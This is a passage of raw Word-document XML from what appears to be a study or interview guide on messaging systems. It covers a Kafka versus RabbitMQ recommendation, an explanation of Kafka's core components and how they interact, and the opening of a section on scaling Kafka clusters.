      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="19F32EA9" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68DC940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aturity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7126AA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ature AMQP implementation, widely adopted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2151CC28"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3297" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A11EE4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ich to Choose?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEFDCA8"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Kafka if:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F10D53"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istributed data streaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7298D907"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ant </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message repla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toleranc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vent sourcing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCAE45E"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with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>big dat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icroservic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oT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA7C9A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RabbitMQ if:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F108D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quick and reliable </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEC871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have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>complex routing requirements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or need </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>prioritized queues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F06F0D7"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handling </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>task queu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ackground jobs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RPC-like</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78525B7E"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3298" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8CE67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CE4B95" w14:paraId="1DC9CDFD" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A730AAC"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Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A6D4A58"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Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="1A50DDF2" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61F0295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Logging platform / Metrics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="556EE4E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406B81FD" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B5F46D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r w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="73DE47E6" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77668EF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3DFEED88" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3179284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bl>
    <w:p w14:paraId="77EB5597"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3299" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C022E93" w14:textId="77777777" w:rsidR="005C743A" w:rsidRPr="00CE4B95" w:rsidRDefault="005C743A" w:rsidP="005C743A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12E54F97" w14:textId="5D288015" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66" w:rsidP="00603C66">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="816" w:name="_Toc197868030"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain the key components of Kafka (Producer, Consumer, Broker, Topic, Partition, and Consumer Group) and how they interact in a Kafka-based system?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="816"/>
    </w:p>
    <w:p w14:paraId="022B00F7" w14:textId="3DE1C987" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D0C24A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1. Producer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E5F9CC"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Producer Responsibilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566B4BAF"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Decides the topic and partition where the message should be sent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D434A2B"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Ensures message reliability via configurations like acks (acknowledgments).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49814C68"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Handles backpressure by buffering records when necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005D0422"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B74315F"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The producer sends record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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0396B2A7"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brokers then store the records in the corresponding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the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475067CE"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3300" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8A302B" w14:textId="77777777" w:rsidR="007D5085" w:rsidRPr="00CE4B95" w:rsidRDefault="007D5085" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72AB2ECA" w14:textId="13DDC98F"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2. Consumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2EF657"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is an application that reads messages (or records) from Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AD444B"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xml:space="preserve">: Consumers subscribe to one or more Kafka topics and read messages from them. Consumers can read messages in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pull</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> model, meaning they request messages from a broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3221BF2C"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Consumer Responsibilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AFD13A"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Pulls records from Kafka brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFA7A89"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Keeps track of the offset (i.e., position) of the messages that it has processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163B92C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67B31FE"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read messages from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Each consumer can read from one or more partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F399240"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belong to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load balancing and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAC64D6"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3301" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A5397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3. Broker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B995368"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broker</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Broker Responsibilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6D2E15"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Manages message storage for each partition of each topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8DCF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Handles requests from producers and consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D65A114"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Ensures message replication to provide fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE145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Tracks consumer offsets and handles failover scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233B97CE"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403B811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store messages for each partition in a topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D4459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 xml:space="preserve">They serve both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by receiving messages) and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by serving messages).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7EA3D1"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3302" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B1D66D"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4. Topic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7BE75E"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Topic Responsibilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4842FE5D"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Organizes and categorizes messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D25123F"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Supports multiple partitions for parallelism and scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2239DA46"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0776BAD"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206A80D3"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subscribes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to receive messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DCE2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3303" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E011DB"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5. Partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4319D44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Partition Responsibilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456AEA71"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Holds messages ordered by offset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B0BEAD"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Partitions allow parallel data processing and balancing load between brokers and consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648FD394"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Each partition can be replicated to provide fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB4C1B5"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3D784101"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9628DC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from specific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64E5803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re replicated across multipl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for high availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53742939"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3304" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABFF73E" w14:textId="77777777" w:rsidR="007D5085" w:rsidRPr="00CE4B95" w:rsidRDefault="007D5085" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E60E6A7" w14:textId="77777777" w:rsidR="007D5085" w:rsidRPr="00CE4B95" w:rsidRDefault="007D5085" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A5E63D9" w14:textId="717CDE16"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6. Consumer Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02294424"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 Responsibilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ED0F81"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Distributes the load of consuming messages among multiple consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2578B41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Ensures that each message in a partition is processed only once (no duplication).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A19C5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Allows for horizontal scaling (more consumers) in the processing pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF7821C"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E47311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jo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and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7C33B6D7"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ssign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Offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are managed per consumer group to track consumption progress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9189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3305" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="664AB3F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How They All Interact in a Kafka-Based System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE5E2A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send message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which stores them in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of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03583D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is responsible for managing message storage and serving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who request messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601011D8"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subscribe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consume messages from the partitions. They are usually part of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distributed processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63896887"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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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allows horizontal scaling: More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send messages, more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can read messages, and mor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can handle the load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13453434"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Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F066DC"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a message to the Kafka broker for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01A6FA11"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The Kafka broker writes the message to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7DD4001D"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with two consumers, </w:t>
      </w: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subscribes to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4915639A"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reads messages from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549AF51E"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can either consume messages from another partition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 xml:space="preserve"> or from the same partition if there's more than one partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BA687F"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ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scalabilit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allelism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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3306" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9807B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Pr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005C743A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="467D8DD4">
          <v:rect id="_x0000_i3307" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3666BB" w14:textId="7EFAE004" w:rsidR="002D75F3" w:rsidRPr="00CE4B95" w:rsidRDefault="00797A8F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="817" w:name="_Toc197868031"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to scale up Kafka</w:t>
      </w:r>
      <w:r w:rsidR="002D75F3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="817"/>
    </w:p>
    <w:p w14:paraId="23987BEE" w14:textId="7CA5E454" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091"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Scaling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Scaling Kafka: Key Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743D83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Brokers Horizontally (Increase Brokers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DE45E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Add more brokers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the Kafka cluster to distribute the load and improve availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482C0F1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uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partitioning</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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BF317F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dd new brokers to the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EC14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Update </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>server.properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each new broker (e.g., broker.id, listeners, log.dirs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C96FE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Increase Partitions for Topics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466F085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by dividing data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which can be distributed across multiple brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA05BA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ing the number of partitions allows for better parallelism and higher throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEA0D2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600A5B2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2924207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FD6FB5"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You can monitor the partition distribution across brokers and rebalance them if necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5FDFF1"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Consumers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321EEA82"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upports </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>horizontal scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for consumers. You can add more </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer instance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to handle more partitions in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67173B6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99FD491"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number of consumers in the consumer group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AA9C1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Producers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C7677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producers can handle high throughput by making use of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous writ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batching</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. As more producers are added, they can write data in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD9A92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uning the producer configurations (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>batch.siz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linger.m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acks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
